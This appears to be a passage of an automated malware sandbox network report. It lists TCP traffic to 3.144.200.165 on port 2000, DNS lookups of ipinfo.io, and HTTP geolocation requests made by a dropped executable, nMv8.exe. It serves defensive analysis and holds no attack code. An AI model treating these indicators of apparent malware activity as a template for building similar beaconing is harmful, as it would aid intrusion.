Nov 3, 2021 14:44:41.254631042 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.254633904 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254650116 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254652023 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.254666090 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254682064 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254688978 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.254698038 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254713058 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254728079 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.254729033 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254745007 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254751921 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.254759073 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254771948 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.254776001 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254796982 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254807949 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.254812956 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254828930 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254837990 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.254846096 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254861116 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254875898 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254890919 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254898071 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.254906893 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254921913 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254928112 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.254937887 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254954100 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254968882 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254971027 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.254983902 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.254996061 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.254998922 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.255016088 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.255028963 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.255033016 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.255048990 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.255064964 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.255080938 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.255083084 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.255098104 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.255105972 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.255114079 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.255122900 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.255130053 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.255146980 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.255156994 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.255215883 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.384071112 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.384130001 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.384176970 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.384221077 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.384293079 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.384352922 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.385720015 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.385770082 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.385899067 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.394773006 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.394820929 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.394848108 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.394874096 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.394900084 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.394925117 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.394953012 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.394975901 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.394984961 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.395009995 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.395036936 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.395057917 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.395061970 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.395071983 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.395090103 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.395116091 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.395132065 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.395143032 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.395169973 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.395184040 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.395195007 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.395210981 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.395220041 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.395246983 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.395266056 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.395328045 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.397201061 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.397232056 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.397296906 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.397324085 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.397351027 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.397373915 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.397377014 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.397403955 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.397430897 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.397456884 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.397464037 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.397484064 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.397510052 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.397511005 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.397537947 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.397566080 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.397578955 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.397589922 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.397617102 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.397640944 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.397667885 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.402803898 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.402844906 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.402873039 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.402904034 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.402934074 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.402956009 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.402983904 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.402987957 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.403012991 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.403042078 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.403048038 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.403072119 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.403074026 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.403100014 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.403111935 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.403127909 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.403157949 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.403172016 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.403184891 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.403214931 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.403228045 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.403243065 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.403273106 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.403275967 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.403302908 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.403328896 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.403330088 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.403359890 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.403409004 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.406529903 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.406567097 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.406589985 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.406613111 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.406641006 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.406670094 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.406699896 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.406728029 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.406747103 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.406761885 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.406783104 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.406793118 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.406815052 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.406821966 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.406852961 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.406881094 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.406894922 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.406908989 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.406939030 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.406945944 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.406969070 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.406997919 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407001019 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.407027960 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407056093 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407062054 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.407084942 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407113075 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407140017 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407145977 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.407169104 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407193899 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.407197952 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407228947 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407243013 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.407258034 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407286882 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407289982 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.407320976 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407345057 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.407351017 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407378912 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407407999 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407422066 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.407435894 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407468081 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407468081 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.407496929 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407526970 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407535076 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.407555103 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407582998 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407586098 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.407610893 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407639027 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407651901 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.407666922 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407696009 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407710075 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.407725096 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407752991 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407756090 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.407782078 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407812119 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407814026 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.407840967 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407870054 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407871962 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.407900095 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407928944 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.407932997 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.407958031 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:41.408008099 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:41.462740898 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:46.823821068 CET	49805	80	192.168.2.4	34.117.59.81
Nov 3, 2021 14:44:46.840651989 CET	80	49805	34.117.59.81	192.168.2.4
Nov 3, 2021 14:44:46.840790033 CET	49805	80	192.168.2.4	34.117.59.81
Nov 3, 2021 14:44:46.841120958 CET	49805	80	192.168.2.4	34.117.59.81
Nov 3, 2021 14:44:46.859632015 CET	80	49805	34.117.59.81	192.168.2.4
Nov 3, 2021 14:44:46.970453978 CET	80	49805	34.117.59.81	192.168.2.4
Nov 3, 2021 14:44:46.972621918 CET	49805	80	192.168.2.4	34.117.59.81
Nov 3, 2021 14:44:46.991492987 CET	80	49805	34.117.59.81	192.168.2.4
Nov 3, 2021 14:44:46.993932009 CET	49805	80	192.168.2.4	34.117.59.81
Nov 3, 2021 14:44:50.198162079 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:50.346369982 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:50.346446991 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:45:05.487320900 CET	49817	80	192.168.2.4	34.117.59.81
Nov 3, 2021 14:45:05.506443977 CET	80	49817	34.117.59.81	192.168.2.4
Nov 3, 2021 14:45:05.506642103 CET	49817	80	192.168.2.4	34.117.59.81
Nov 3, 2021 14:45:05.507013083 CET	49817	80	192.168.2.4	34.117.59.81
Nov 3, 2021 14:45:05.526256084 CET	80	49817	34.117.59.81	192.168.2.4
Nov 3, 2021 14:45:05.634196043 CET	80	49817	34.117.59.81	192.168.2.4
Nov 3, 2021 14:45:05.635343075 CET	49817	80	192.168.2.4	34.117.59.81
Nov 3, 2021 14:45:05.654375076 CET	80	49817	34.117.59.81	192.168.2.4
Nov 3, 2021 14:45:05.654692888 CET	49817	80	192.168.2.4	34.117.59.81
Nov 3, 2021 14:45:14.671905994 CET	49837	80	192.168.2.4	34.117.59.81
Nov 3, 2021 14:45:14.691075087 CET	80	49837	34.117.59.81	192.168.2.4
Nov 3, 2021 14:45:14.691222906 CET	49837	80	192.168.2.4	34.117.59.81
Nov 3, 2021 14:45:14.691765070 CET	49837	80	192.168.2.4	34.117.59.81
Nov 3, 2021 14:45:14.710761070 CET	80	49837	34.117.59.81	192.168.2.4
Nov 3, 2021 14:45:14.820589066 CET	80	49837	34.117.59.81	192.168.2.4
Nov 3, 2021 14:45:14.822294950 CET	49837	80	192.168.2.4	34.117.59.81
Nov 3, 2021 14:45:14.841447115 CET	80	49837	34.117.59.81	192.168.2.4
Nov 3, 2021 14:45:14.841622114 CET	49837	80	192.168.2.4	34.117.59.81
Nov 3, 2021 14:45:23.047979116 CET	49766	2000	192.168.2.4	3.144.200.165

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 3, 2021 14:44:46.797132969 CET	63153	53	192.168.2.4	8.8.8.8
Nov 3, 2021 14:44:46.815994978 CET	53	63153	8.8.8.8	192.168.2.4
Nov 3, 2021 14:45:05.451895952 CET	53700	53	192.168.2.4	8.8.8.8
Nov 3, 2021 14:45:05.470858097 CET	53	53700	8.8.8.8	192.168.2.4
Nov 3, 2021 14:45:14.644969940 CET	56794	53	192.168.2.4	8.8.8.8
Nov 3, 2021 14:45:14.664151907 CET	53	56794	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 3, 2021 14:44:46.797132969 CET	192.168.2.4	8.8.8.8	0xabec	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)
Nov 3, 2021 14:45:05.451895952 CET	192.168.2.4	8.8.8.8	0x7e3f	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)
Nov 3, 2021 14:45:14.644969940 CET	192.168.2.4	8.8.8.8	0xacca	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 3, 2021 14:43:55.488094091 CET	8.8.8.8	192.168.2.4	0x52b2	No error (0)	a-0019.a.dns.azurefd.net	a-0019.standard.a-msedge.net		CNAME (Canonical name)	IN (0x0001)
Nov 3, 2021 14:44:46.815994978 CET	8.8.8.8	192.168.2.4	0xabec	No error (0)	ipinfo.io		34.117.59.81	A (IP address)	IN (0x0001)
Nov 3, 2021 14:45:05.470858097 CET	8.8.8.8	192.168.2.4	0x7e3f	No error (0)	ipinfo.io		34.117.59.81	A (IP address)	IN (0x0001)
Nov 3, 2021 14:45:14.664151907 CET	8.8.8.8	192.168.2.4	0xacca	No error (0)	ipinfo.io		34.117.59.81	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

ipinfo.io

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49805	34.117.59.81	80	C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2021 14:44:46.841120958 CET	6137	OUT	GET /json HTTP/1.1 Host: ipinfo.io Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 User-Agent: Mozilla/3.0 (compatible; Indy Library)
Nov 3, 2021 14:44:46.970453978 CET	6138	IN	HTTP/1.1 200 OK access-control-allow-origin: * x-content-type-options: nosniff content-type: application/json; charset=utf-8 content-length: 290 date: Wed, 03 Nov 2021 13:44:46 GMT x-envoy-upstream-service-time: 2 vary: Accept-Encoding Via: 1.1 google Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 34 2e 31 37 2e 35 32 2e 34 35 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 75 6e 6e 2d 38 34 2d 31 37 2d 35 32 2d 34 35 2e 63 64 6e 37 37 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 5a c3 bc 72 69 63 68 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 5a 75 72 69 63 68 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 43 48 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 37 2e 33 38 37 36 2c 38 2e 35 32 30 37 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 36 30 30 36 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 38 30 30 35 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 0a 20 20 22 72 65 61 64 6d 65 22 3a 20 22 68 74 74 70 73 3a 2f 2f 69 70 69 6e 66 6f 2e 69 6f 2f 6d 69 73 73 69 6e 67 61 75 74 68 22 0a 7d Data Ascii: { "ip": "84.17.52.45", "hostname": "unn-84-17-52-45.cdn77.com", "city": "Zrich", "region": "Zurich", "country": "CH", "loc": "47.3876,8.5207", "org": "AS60068 Datacamp Limited", "postal": "8005", "timezone": "Europe/Zurich", "readme": "https://ipinfo.io/missingauth"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49817	34.117.59.81	80	C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2021 14:45:05.507013083 CET	9099	OUT	GET /json HTTP/1.1 Host: ipinfo.io Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 User-Agent: Mozilla/3.0 (compatible; Indy Library)
Nov 3, 2021 14:45:05.634196043 CET	9100	IN	HTTP/1.1 200 OK access-control-allow-origin: * x-content-type-options: nosniff content-type: application/json; charset=utf-8 content-length: 290 date: Wed, 03 Nov 2021 13:45:05 GMT x-envoy-upstream-service-time: 2 vary: Accept-Encoding Via: 1.1 google Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 34 2e 31 37 2e 35 32 2e 34 35 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 75 6e 6e 2d 38 34 2d 31 37 2d 35 32 2d 34 35 2e 63 64 6e 37 37 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 5a c3 bc 72 69 63 68 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 5a 75 72 69 63 68 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 43 48 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 37 2e 33 38 37 36 2c 38 2e 35 32 30 37 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 36 30 30 36 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 38 30 30 35 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 0a 20 20 22 72 65 61 64 6d 65 22 3a 20 22 68 74 74 70 73 3a 2f 2f 69 70 69 6e 66 6f 2e 69 6f 2f 6d 69 73 73 69 6e 67 61 75 74 68 22 0a 7d Data Ascii: { "ip": "84.17.52.45", "hostname": "unn-84-17-52-45.cdn77.com", "city": "Zrich", "region": "Zurich", "country": "CH", "loc": "47.3876,8.5207", "org": "AS60068 Datacamp Limited", "postal": "8005", "timezone": "Europe/Zurich", "readme": "https://ipinfo.io/missingauth"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49837	34.117.59.81	80	C:\Users\user\AppData\Roaming\u0IjY7UrZ\nMv8.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2021 14:45:14.691765070 CET	9165	OUT	GET /json HTTP/1.1 Host: ipinfo.io Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 User-Agent: Mozilla/3.0 (compatible; Indy Library)
Nov 3, 2021 14:45:14.820589066 CET	9166	IN	HTTP/1.1 200 OK access-control-allow-origin: * x-content-type-options: nosniff content-type: application/json; charset=utf-8 content-length: 290 date: Wed, 03 Nov 2021 13:45:14 GMT x-envoy-upstream-service-time: 2 vary: Accept-Encoding Via: 1.1 google Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 34 2e 31 37 2e 35 32 2e 34 35 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 75 6e 6e 2d 38 34 2d 31 37 2d 35 32 2d 34 35 2e 63 64 6e 37 37 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 5a c3 bc 72 69 63 68 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 5a 75 72 69 63 68 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 43 48 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 37 2e 33 38 37 36 2c 38 2e 35 32 30 37 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 36 30 30 